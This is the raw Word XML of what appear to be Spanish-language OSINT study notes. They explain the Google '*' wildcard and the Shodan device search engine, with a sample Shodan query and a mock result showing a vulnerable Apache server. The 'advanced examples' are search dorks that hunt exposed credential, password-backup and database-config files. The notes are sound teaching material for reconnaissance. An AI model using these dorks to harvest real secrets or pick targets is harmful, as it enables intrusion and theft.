          <w:p w14:paraId="22B5C3B7" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Limitaciones:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3221FD10" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t xml:space="preserve">El * reemplaza </w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>palabras completas</w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:t>, no partes de una palabra</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CF62C22" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>Funciona mejor dentro de comillas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B080A53" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>Puede devolver muchos resultados si es muy genérico</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E80FEF3" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="00B941CC" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="44644BB3">
                <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="25C1803A" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ejemplos avanzados:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B6103A5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"* credentials" filetype:txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23D58ADD" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>inurl:backup "password * user *"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="523D036C" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="00416FE9" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00416FE9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"config * database * host *" ext:php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09B9167C" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="00B941CC" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="56B8F708">
                <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CA05B21" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>En resumen:</w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:t xml:space="preserve"> El * es un comodín que rellena espacios desconocidos en frases, útil cuando conoces el patrón pero no las palabras exactas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AB6D94D" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00B25916">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DE12E35" w14:textId="77777777" w:rsidR="001F1890" w:rsidRDefault="001F1890" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E464CEC" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F38D86" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14AF6021" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66643A3A" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534F2B46" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0733DB" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6323B08D" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F1C73A" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694B4AD7" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2522A213" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE348E4" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241D17DE" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C83577E" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CFDF4D" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF5495E" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0ABE6B" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1306FE5F" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BE522C6" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253D3E31" w14:textId="77777777" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6C60F3" w14:textId="6D886D69" w:rsidR="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="002006C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.4 Shodan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C26A15" w14:textId="3D3DDF67" w:rsidR="002006C0" w:rsidRDefault="00D9245A" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9245A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shodan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:t>“El Google de los dispositivos conectados a Internet”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E895A" w14:textId="77777777" w:rsidR="00D9245A" w:rsidRDefault="00D9245A" w:rsidP="00D9245A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué es?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D9245A">
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9245A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">motor de búsqueda </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9245A">
        <w:t>que escanea Internet buscando dispositivos conectados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A91D04D" w14:textId="77777777" w:rsidR="00D9245A" w:rsidRDefault="00D9245A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9245A">
        <w:t xml:space="preserve">Cámaras IP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A795978" w14:textId="77777777" w:rsidR="00D9245A" w:rsidRDefault="00D9245A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9245A">
        <w:t xml:space="preserve">Routers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04510D20" w14:textId="77777777" w:rsidR="00D9245A" w:rsidRDefault="00D9245A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9245A">
        <w:t xml:space="preserve">Servidores </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6A0ECC" w14:textId="77777777" w:rsidR="00D9245A" w:rsidRDefault="00D9245A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9245A">
        <w:t xml:space="preserve">Sistemas industriales (SCADA) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BAB577" w14:textId="77777777" w:rsidR="00D9245A" w:rsidRDefault="00D9245A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9245A">
        <w:t xml:space="preserve">IoT (refrigeradores, termostatos, etc.) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D161CA5" w14:textId="77777777" w:rsidR="00D9245A" w:rsidRDefault="00D9245A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9245A">
        <w:t xml:space="preserve">Bases de datos expuestas </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D3F74D" w14:textId="77777777" w:rsidR="00D9245A" w:rsidRDefault="00D9245A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9245A">
        <w:t xml:space="preserve">Impresoras de red </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C042059" w14:textId="77777777" w:rsidR="00D9245A" w:rsidRDefault="00D9245A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9245A">
        <w:t xml:space="preserve">Semáforos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B28B3FE" w14:textId="4297938B" w:rsidR="00D9245A" w:rsidRDefault="00D9245A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9245A">
        <w:t>Paneles solares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D1D931" w14:textId="4A88AA7D" w:rsidR="00960D31" w:rsidRPr="00960D31" w:rsidRDefault="00960D31" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960D31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Diferencia clav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60D31" w14:paraId="3416404E" w14:textId="77777777" w:rsidTr="00960D31">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04935DD6" w14:textId="77777777" w:rsidR="00960D31" w:rsidRPr="00960D31" w:rsidRDefault="00960D31" w:rsidP="00960D31">
            <w:r w:rsidRPr="00960D31">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Google </w:t>
            </w:r>
            <w:r w:rsidRPr="00960D31">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00960D31">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Indexa PÁGINAS WEB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="708832EA" w14:textId="24838FF1" w:rsidR="00960D31" w:rsidRDefault="00960D31" w:rsidP="00960D31">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00960D31">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Shodan </w:t>
            </w:r>
            <w:r w:rsidRPr="00960D31">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00960D31">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Indexa DISPOSITIVOS y SERVICIOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E7100EF" w14:textId="77777777" w:rsidR="00960D31" w:rsidRDefault="00960D31" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7D9920" w14:textId="77777777" w:rsidR="009206BF" w:rsidRDefault="00960D31" w:rsidP="009206BF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960D31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Qué muestra:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00960D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Para cada dispositivo encuentra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E788B" w14:textId="4A54A17D" w:rsidR="00960D31" w:rsidRPr="00960D31" w:rsidRDefault="009206BF" w:rsidP="009206BF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960D31" w:rsidRPr="00960D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IP pública</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1143291E" w14:textId="7AE88AB5" w:rsidR="00960D31" w:rsidRPr="00960D31" w:rsidRDefault="00960D31" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-Puertos abiertos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D155A" w14:textId="77777777" w:rsidR="00960D31" w:rsidRPr="00960D31" w:rsidRDefault="00960D31" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Servicios corriendo (Apache, MySQL, SSH, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3778F30A" w14:textId="77777777" w:rsidR="00960D31" w:rsidRPr="00960D31" w:rsidRDefault="00960D31" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Versiones de software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36109C34" w14:textId="77777777" w:rsidR="00960D31" w:rsidRPr="00960D31" w:rsidRDefault="00960D31" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Ubicación geográfica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36453B00" w14:textId="77777777" w:rsidR="00960D31" w:rsidRPr="00960D31" w:rsidRDefault="00960D31" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Banner del servicio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723B3CD2" w14:textId="18F54D1D" w:rsidR="00960D31" w:rsidRDefault="00960D31" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Vulnerabilidades conocidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD52F53" w14:textId="08633D0A" w:rsidR="00CF20AA" w:rsidRDefault="00CF20AA" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="36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  <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Ejemplo práctico</w:t>
      </w:r>
      <w:r w:rsidRPr="00960D31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A499E85" w14:textId="77777777" w:rsidR="00CF20AA" w:rsidRPr="00CF20AA" w:rsidRDefault="00CF20AA" w:rsidP="00CF20AA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF20AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Búsqueda en Shoda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F20AA" w14:paraId="11BF7405" w14:textId="77777777" w:rsidTr="00CF20AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B3D179C" w14:textId="6252EE1C" w:rsidR="00CF20AA" w:rsidRDefault="00CF20AA" w:rsidP="00960D31">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF20AA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>apache country:CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47F2A444" w14:textId="77777777" w:rsidR="00CF20AA" w:rsidRPr="00CF20AA" w:rsidRDefault="00CF20AA" w:rsidP="00CF20AA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF20AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Resultad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F20AA" w14:paraId="1A6B7B2D" w14:textId="77777777" w:rsidTr="00CF20AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50188EE1" w14:textId="77777777" w:rsidR="00CF20AA" w:rsidRPr="00CF20AA" w:rsidRDefault="00CF20AA" w:rsidP="00CF20AA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF20AA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Servidor Apache 2.2.15 (vulnerable)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="592E3537" w14:textId="77777777" w:rsidR="00CF20AA" w:rsidRPr="00CF20AA" w:rsidRDefault="00CF20AA" w:rsidP="00CF20AA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF20AA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>IP: 200.X.X.X</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CBC52E6" w14:textId="77777777" w:rsidR="00CF20AA" w:rsidRPr="00CF20AA" w:rsidRDefault="00CF20AA" w:rsidP="00CF20AA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF20AA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Puerto: 80, 443, 8080</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC52C2E" w14:textId="77777777" w:rsidR="00CF20AA" w:rsidRPr="00CF20AA" w:rsidRDefault="00CF20AA" w:rsidP="00CF20AA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF20AA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Ubicación: Santiago, Chile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3CA666" w14:textId="77777777" w:rsidR="00CF20AA" w:rsidRPr="00CF20AA" w:rsidRDefault="00CF20AA" w:rsidP="00CF20AA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF20AA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Organización: Empresa XYZ</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C072D8E" w14:textId="53C847AF" w:rsidR="00CF20AA" w:rsidRDefault="00CF20AA" w:rsidP="00CF20AA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF20AA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Vulnerabilidades: CVE-2017-XXXX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6852093F" w14:textId="77777777" w:rsidR="00CF20AA" w:rsidRDefault="00CF20AA" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
